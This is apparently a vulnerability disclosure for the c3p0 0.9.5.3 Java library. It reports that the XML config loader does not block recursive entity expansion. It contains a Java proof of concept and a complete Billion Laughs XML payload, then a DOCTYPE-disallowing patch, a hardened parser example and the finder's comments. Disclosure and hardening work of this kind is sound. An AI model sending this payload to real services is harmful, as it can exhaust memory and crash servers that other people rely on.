groupId: com.mchange
artifactId: c3p0
version: 0.9.5.3
> c3p0/src/java/com/mchange/v2/c3p0/cfg/C3P0ConfigXmlUtils.java
does not protect against recursive entity expansion when loading configuration.
Source File and Line Number: https://github.com/swaldman/c3p0/blob/c3p0-0.9.5.3/src/java/com/mchange/v2/c3p0/cfg/C3P0ConfigXmlUtils.java#L154
> Detailed steps to reproduce with all required references/steps/commands. Any sample/exploit code or other proof of concept.
Call C3P0ConfigXmlUtils.extractXmlConfigFromInputStream() on a Billion Laughs XML payload:

import com.mchange.v2.c3p0.cfg.C3P0ConfigXmlUtils;
import java.io.InputStream;

public class C3P0PoC {
    public static void main(String[] args) throws Exception {
        // Classpath resource name of the XML payload (see "XML Payload" below)
        String payload = args[0];
        InputStream inputStream = C3P0PoC.class.getResourceAsStream(payload);
        // The vulnerable parser expands the nested entities while loading the config
        C3P0ConfigXmlUtils.extractXmlConfigFromInputStream(inputStream, false);
        System.out.println("Completed!");
    }
}
XML Payload
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ELEMENT lolz (#PCDATA)>
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>
The patch given was adapted from https://github.com/OWASP/CheatSheetSeries/blob/master/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.md#jaxp-documentbuilderfactory-saxparserfactory-and-dom4j

Apply the following before calling fact.newDocumentBuilder():

String FEATURE = "http://apache.org/xml/features/disallow-doctype-decl";
fact.setFeature(FEATURE, true);
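The following is an added example (not c3p0's code and not part of the original report) showing the hardened DocumentBuilderFactory configuration in context: the disallow-doctype-decl feature from the patch above, combined with JAXP secure processing, and a small check that a DOCTYPE-bearing document is rejected before any entity expansion happens while a plain document still parses. The class name, method names and the two constructed sample documents (including the c3p0-config root element) are assumptions for illustration only.

```java
import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import java.io.ByteArrayInputStream;
import java.nio.charset.StandardCharsets;
import org.w3c.dom.Document;
import org.xml.sax.SAXParseException;

// Hypothetical helper (added example, not c3p0 code)
public class HardenedXmlConfigLoader {

    private static final String DISALLOW_DOCTYPE =
        "http://apache.org/xml/features/disallow-doctype-decl";

    // Build a factory that refuses any DTD, which is what stops
    // Billion Laughs and XXE at the source: no DOCTYPE, no entities.
    public static DocumentBuilderFactory hardenedFactory() throws ParserConfigurationException {
        DocumentBuilderFactory fact = DocumentBuilderFactory.newInstance();
        fact.setFeature(DISALLOW_DOCTYPE, true);
        fact.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        fact.setXIncludeAware(false);
        // Note: setExpandEntityReferences(false) only controls whether
        // EntityReference nodes are kept in the DOM; on its own it does not
        // prevent the parser from resolving DTD-declared entities.
        fact.setExpandEntityReferences(false);
        return fact;
    }

    // Returns true if the hardened parser rejected the document.
    public static boolean rejectsDocument(String xml) throws Exception {
        DocumentBuilder db = hardenedFactory().newDocumentBuilder();
        try {
            Document doc = db.parse(
                new ByteArrayInputStream(xml.getBytes(StandardCharsets.UTF_8)));
            return doc == null;
        } catch (SAXParseException e) {
            // Xerces raises this as soon as it sees the DOCTYPE declaration
            return true;
        }
    }

    public static void main(String[] args) throws Exception {
        // Constructed sample input: a single harmless entity is enough to
        // trigger the DOCTYPE rejection; no expansion bomb is needed.
        String doctypeDoc =
            "<?xml version=\"1.0\"?>\n"
          + "<!DOCTYPE c3p0-config [<!ENTITY a \"aa\">]>\n"
          + "<c3p0-config>&a;</c3p0-config>";
        // Constructed sample input: ordinary configuration without a DTD.
        String plainDoc =
            "<?xml version=\"1.0\"?>\n"
          + "<c3p0-config><default-config/></c3p0-config>";

        System.out.println("DOCTYPE document rejected: " + rejectsDocument(doctypeDoc));
        System.out.println("plain document rejected:   " + rejectsDocument(plainDoc));
    }
}
```

Rejecting the DOCTYPE outright is preferable to tuning entity expansion limits: configuration files for a connection pool have no legitimate need for a DTD, so the failure is loud and immediate rather than a slow resource drain.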
> Finder’s comments and funny memes goes here
Honestly, this is a pretty complicated attack to pull off. The attack requires poisoned XML configuration data to make it to the component’s client code. I may have held off on reporting it, but the maintainer did acknowledge a similar attack, ’twas XXE, under CVE-2018-20433. Since the reporter didn’t dispute it, I decided to report this attack as valid as well.
Vulnerabilities like these exist because https://docs.oracle.com/javase/7/docs/api/javax/xml/parsers/DocumentBuilderFactory.html#setExpandEntityReferences(boolean) is a poorly named and documented method thus causing misunderstanding.
I’m on my third five hour energy today.
This could be leveraged by an attacker to cause a Denial of Service by crashing the JVM that the server process is running on.